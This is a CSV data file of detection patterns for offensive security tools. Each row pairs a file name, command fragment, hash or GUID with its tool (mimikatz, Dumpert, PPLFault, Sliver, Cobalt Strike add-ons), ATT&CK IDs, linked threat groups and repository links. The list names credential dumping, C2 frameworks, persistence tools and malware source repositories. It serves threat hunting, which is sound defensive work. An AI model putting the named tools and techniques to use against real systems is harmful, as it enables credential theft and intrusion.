"*DumpPEFromMemoryMemory.exe*",".{0,1000}DumpPEFromMemoryMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41694"
"*DumpSAM.ps1*",".{0,1000}DumpSAM\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","41696"
"*DumpShellcode.*",".{0,1000}DumpShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","41697"
"*DumpShellcode.exe*",".{0,1000}DumpShellcode\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","41698"
"*DumpShellcode\*",".{0,1000}DumpShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","41699"
"*DumpSMSAPassword*",".{0,1000}DumpSMSAPassword.{0,1000}","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","AD Enumeration","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41700"
"*dumpVaultCredentials.py*",".{0,1000}dumpVaultCredentials\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","41701"
"*dumpXor.exe *",".{0,1000}dumpXor\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","41702"
"*dumpy.exe --dump*",".{0,1000}dumpy\.exe\s\-\-dump.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","41703"
"*DyeKuu/DNS-Hijacking*",".{0,1000}DyeKuu\/DNS\-Hijacking.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z","41712"
"*Dynamically convert a native PE to PIC shellcode*",".{0,1000}Dynamically\sconvert\sa\snative\sPE\sto\sPIC\sshellcode.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41713"
"*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","41714"
"*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","41715"
"*Dyn-NetClone|x64*",".{0,1000}Dyn\-NetClone\|x64.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","41716"
"*Dyn-PyClone|Win32*",".{0,1000}Dyn\-PyClone\|Win32.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","41717"
"*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*",".{0,1000}\-e\s\-\-enumerate\sgoogle.{0,1000}github.{0,1000}k8s\s\-\-github\-only\-org\s\-\-k8s\-get\-secret\-values\s\-\-gcp\-get\-secret\-values.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","41718"
"*-e localtonet.service*",".{0,1000}\-e\slocaltonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","41719"
"*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*",".{0,1000}\-e\sZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA\=.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","#base64","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","41720"
"*e00489f1e9416d9d857d35b22e5e9ad23b6afdadc0da7bc3687df67c49e870c0*",".{0,1000}e00489f1e9416d9d857d35b22e5e9ad23b6afdadc0da7bc3687df67c49e870c0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41721"
"*e01bd0e0c7ea9278a4047c18f464e01e8c4e0d48323bca3a273cd60ff3ed78e1*",".{0,1000}e01bd0e0c7ea9278a4047c18f464e01e8c4e0d48323bca3a273cd60ff3ed78e1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#filehash","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","41724"
"*e01dc0dc7863c3603c388e7a0629420dea1d437cefe6f385829054589d58e913*",".{0,1000}e01dc0dc7863c3603c388e7a0629420dea1d437cefe6f385829054589d58e913.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41725"
"*e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49*",".{0,1000}e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41726"
"*e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321*",".{0,1000}e022c33f7f02b564f42f4ae68edded719b3e4cfdb3ea9ce9de2d07dc1c586321.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","41727"
"*e024e14ccb85b8c59cfc10ee2d9aa867c85e036382363fd8581c97ecaaf10fb4*",".{0,1000}e024e14ccb85b8c59cfc10ee2d9aa867c85e036382363fd8581c97ecaaf10fb4.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","0","#filehash","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","41729"
"*e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e*",".{0,1000}e0327c1218fd3723e20acc780e20135f41abca35c35e0f97f7eccac265f4f44e.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","41732"
"*e033b98287a6e38f34841095d91ef08af0170a7915e25da341a7b6142756d274*",".{0,1000}e033b98287a6e38f34841095d91ef08af0170a7915e25da341a7b6142756d274.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41733"
"*E0362605-CC11-4CD5-AFF7-B50934438658*",".{0,1000}E0362605\-CC11\-4CD5\-AFF7\-B50934438658.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","41734"
"*E0362605-CC11-4CD5-AFF7-B50934438658*",".{0,1000}E0362605\-CC11\-4CD5\-AFF7\-B50934438658.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#GUIDproject","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","41735"
"*e0477338261831c6830884650d12f079a5a473547f5c76f70ecc2518aae62901*",".{0,1000}e0477338261831c6830884650d12f079a5a473547f5c76f70ecc2518aae62901.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","41736"
"*E049487C-C5BD-471E-99AE-C756E70B6520*",".{0,1000}E049487C\-C5BD\-471E\-99AE\-C756E70B6520.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","41737"
"*e04c023e1ff561f7bdfaef366050533bf3f6e0a06675112911403fc5d3fafb71*",".{0,1000}e04c023e1ff561f7bdfaef366050533bf3f6e0a06675112911403fc5d3fafb71.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","41738"
"*e04db985cc121db070da15582404750b26819e09e96a4a1026613ae25e034f73*",".{0,1000}e04db985cc121db070da15582404750b26819e09e96a4a1026613ae25e034f73.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","41739"
"*e0525b4fd45c8a2c37b577f0609c43d626b2d9837befa03096ebc60f6c52ff25*",".{0,1000}e0525b4fd45c8a2c37b577f0609c43d626b2d9837befa03096ebc60f6c52ff25.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41741"
"*e0527306862820f76f0d843e93c1a19925697a7f2377b41377cbe99031549920*",".{0,1000}e0527306862820f76f0d843e93c1a19925697a7f2377b41377cbe99031549920.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","41742"
"*e05b1fa26c9571a7c6111e64a5d710f7bd03fa9795ac68a5f405ba3ac99503e5*",".{0,1000}e05b1fa26c9571a7c6111e64a5d710f7bd03fa9795ac68a5f405ba3ac99503e5.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41744"
"*e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa*",".{0,1000}e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","41745"
"*e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8*",".{0,1000}e05ef2747f973d6ae9e4bd5fbeede55b27afd44882b83b4aee79330e856757e8.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","41746"
"*e06104b2d8e8ba207a916352e2f49e4d03f6b0c3bb04d5703e71037ff279ec4d*",".{0,1000}e06104b2d8e8ba207a916352e2f49e4d03f6b0c3bb04d5703e71037ff279ec4d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","41747"
"*e064a38f4cb8dbe91f3be32c1b2e925c40ceff78ce299bd1e6cf77339def978a*",".{0,1000}e064a38f4cb8dbe91f3be32c1b2e925c40ceff78ce299bd1e6cf77339def978a.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","41748"
"*e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17*",".{0,1000}e066fd26097862651947220c02240ca24faceb5f4ca0d1279881d97f7cff2c17.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41749"
"*E0695F0F-0FAF-44BC-AE55-A1FCBFE70271*",".{0,1000}E0695F0F\-0FAF\-44BC\-AE55\-A1FCBFE70271.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","41750"
"*e06ff243f2101ea3fd1ff5f69109896d56776bd5d92d62e5607f12c693ece5e7*",".{0,1000}e06ff243f2101ea3fd1ff5f69109896d56776bd5d92d62e5607f12c693ece5e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41752"
"*e070581ad8dc1ca4c1ed0a4372622a03f807fda24a7cf4856e77382c8ce43c4e*",".{0,1000}e070581ad8dc1ca4c1ed0a4372622a03f807fda24a7cf4856e77382c8ce43c4e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","41753"
